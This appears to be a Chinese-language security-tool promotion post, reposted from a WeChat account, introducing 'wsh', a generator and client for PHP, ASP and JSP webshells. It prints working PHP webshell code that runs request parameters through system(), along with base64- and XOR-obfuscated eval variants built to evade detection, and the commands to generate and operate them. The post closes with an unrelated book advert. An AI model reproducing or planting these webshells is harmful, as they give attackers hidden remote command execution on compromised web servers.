===================================
0x01 工具介绍
该客户端具有命令历史记录、日志记录,并且可以配置为使用表单/按钮与先前部署的标准 webshell 交互。生成器在 php、asp 和 jsp 中创建 webshell。它们是用随机变量生成的,因此每个变量都有一个唯一的哈希值。它们可以配置白名单、密码,并允许通过自定义标头和参数发送命令。欢迎关注公众号web安全工具库,生成器和客户端可以通过命令行标志或配置文件进行配置,以允许保存适合您的设置,而无需执行我所谓的“--help”舞蹈。配置后,客户端和生成器使用相同的配置文件。
0x02 安装与使用
1、以下命令生成一个简单的 php web shell 并与之交互。
$ wsh generate php --param cmd --no-file -o shell.phpCreated shell at shell.php.$ wsh 127.0.0.1:8080/shell.php --param cmd<?php$MfOb = $_REQUEST['cmd'];$MfOb = trim($MfOb);system($MfOb);die;?>
2、命令也可以通过 http 标头发送
$ wsh generate php --no-file --header user-agent -o shell.phpCreated shell at shell.php.$ wsh 127.0.0.1:8080/shell.php --header user-agent
3、Base64 / XOR 加密
$ wsh g php --param cmd --no-file --base64<?phpeval(base64_decode('JEZISENTPSRfUkVRVUVTVFsnY21kJ107JEZISENTPXRyaW0oJEZISENTKTtzeXN0ZW0oJEZISENTKTtkaWU7'))?>$ wsh g php --param cmd --no-file --xor-key S3cr3tK3y --xor-param X-Key<?php$KHhx = $_REQUEST["X-Key"];$LqC = base64_decode("d2MPPUdJb2wrFmI2N2AgEBQaPldELwhQG182Jw4XAFoZYxcpP3wXWwgHMkANNl5LVmMYBEdQaFcKFwg=");$oooqt = "";for($YpuI=0; $YpuI<strlen($LqC); ) {for($cMq=0; ($cMq<strlen($KHhx) && $YpuI<strlen($LqC)); $cMq++,$YpuI++) {$oooqt .= $LqC{ $YpuI } ^ $KHhx{ $cMq };}}eval($oooqt);?>
0x03 项目链接下载
2、欢迎关注公众号"web安全工具库"
· 推 荐 阅 读 ·
《C++20实践入门(第6版)》
本书抽丝剥茧地呈现C++20的诸多新特性,如模块、概念、范围和太空飞船运算符等。即使不具备编程经验,你也可在本书的指引下,快速在一个较新的C++编译器上编写出真正可用的C++程序。
文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247504927&idx=1&sn=28739ff47425f02606443b45003554eb&chksm=ebb53b1cdcc2b20af68497f01cd78c82dba253e10b45de93e3f88e16c359fce6b00fbc51ede6#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh